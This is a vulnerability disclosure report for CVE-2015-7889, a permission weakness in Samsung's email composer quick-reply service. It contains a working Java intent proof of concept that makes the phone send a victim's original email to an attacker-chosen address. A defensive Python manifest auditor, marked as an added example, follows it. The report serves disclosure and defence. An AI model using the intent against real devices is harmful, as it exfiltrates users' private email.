Status: Fixed
Closed: Oct 2015
Samsung SecEmailComposer QUICK_REPLY_BACKGROUND permissions weakness
Project Member Reported by hawkes@google.com, Jul 29 2015
The SecEmailComposer/EmailComposer application used by the Samsung S6 Edge has an exported service action to do quick replies to emails. It was found that this action required no permissions to call, and could lead to an unprivileged application gaining access to email content.

Service Action: com.samsung.android.email.intent.action.QUICK_REPLY_BACKGROUND
Component: com.samsung.android.email.composer
Class Name: com.samsung.android.email.composer.service.QuickReplyService

The service takes a JSON encoded string with various additional parameters. We need to know two parameters, the email address of the local account and a message ID. We can guess a valid message ID (which just seems to be an incrementing number).

If we guess an invalid ID the service simply returns, but if we do get a valid ID the service seems to automatically create the reply email, attach an attacker-supplied message as well as the contents of the original message, and send it to any email address you like. For example:

Intent intent = new Intent();
intent.setAction("com.samsung.android.email.intent.action.QUICK_REPLY_BACKGROUND");
intent.setClassName("com.samsung.android.email.composer",
       "com.samsung.android.email.composer.service.QuickReplyService");
intent.putExtra("data", "{'original-msg-id':1, " +
       "'account-id':'project.zero.victim@gmail.com', " +
       "'msg':'Hello World!'," +
       "'title':'Hello Title'," +
       "'toList':'project.zero.attacker@gmail.com'}");
ComponentName name = MainActivity.this.startService(intent);

No permissions are required to send this service intent. If successfully sent, this will show up in a "sent email" notification and will be present in the user’s sent email folder.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
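
A defender-side check for the weakness described in this report, as an added example that is not part of the original report or of the vendor's code: it audits a decoded AndroidManifest.xml for services that any installed app can start. The manifest below is constructed for illustration; the com.example.* names, HardenedReplyService and InternalService are hypothetical.

```python
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"

# Constructed manifest for illustration; not the vendor's actual file.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.samsung.android.email.composer">
  <permission android:name="com.example.permission.QUICK_REPLY" android:protectionLevel="signature"/>
  <application>
    <service android:name=".service.QuickReplyService">
      <intent-filter>
        <action android:name="com.samsung.android.email.intent.action.QUICK_REPLY_BACKGROUND"/>
      </intent-filter>
    </service>
    <service android:name=".service.HardenedReplyService"
        android:permission="com.example.permission.QUICK_REPLY">
      <intent-filter><action android:name="com.example.action.HARDENED_REPLY"/></intent-filter>
    </service>
    <service android:name=".service.InternalService" android:exported="false"/>
  </application>
</manifest>"""


def audit_services(manifest_xml):
    """Return (service, actions, reason) for each exported service any app can start."""
    root = ET.fromstring(manifest_xml)
    app = root.find("application")
    # Permissions declared in this manifest, mapped to their protection level.
    levels = {p.get(ANDROID + "name"): p.get(ANDROID + "protectionLevel", "normal")
              for p in root.findall("permission")}
    findings = []
    for svc in app.findall("service"):
        actions = [a.get(ANDROID + "name") for a in svc.findall("intent-filter/action")]
        exported = svc.get(ANDROID + "exported")
        # Before Android 12, an intent filter implied exported=true when unset.
        if exported == "false" or (exported is None and not actions):
            continue
        perm = svc.get(ANDROID + "permission") or app.get(ANDROID + "permission")
        if perm is None:
            reason = "no permission required"
        # Assumption: permissions not declared in this manifest are not judged.
        elif "signature" not in levels.get(perm, "signature"):
            reason = "guarded by non-signature permission " + perm
        else:
            continue
        findings.append((svc.get(ANDROID + "name"), actions, reason))
    return findings

for finding in audit_services(SAMPLE_MANIFEST):
    print(finding)
```

Only the service with an intent filter and no android:permission is reported; a service guarded by a permission that this manifest declares at a non-signature protection level is reported as well, since any app can request such a permission.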

 
Project Member Comment 1 by scvitti@google.com, Jul 30 2015
Labels: -Reported-2015-July-29 Reported-2015-Jul-29
Project Member Comment 2 by natashenka@google.com, Oct 22 2015
Status: Fixed
Project Member Comment 3 by natashenka@google.com, Oct 23 2015
Labels: CVE-2015-7889
Project Member Comment 4 by natashenka@google.com, Oct 27 2015
Labels: -Restrict-View-Commit
Fixed in October MR.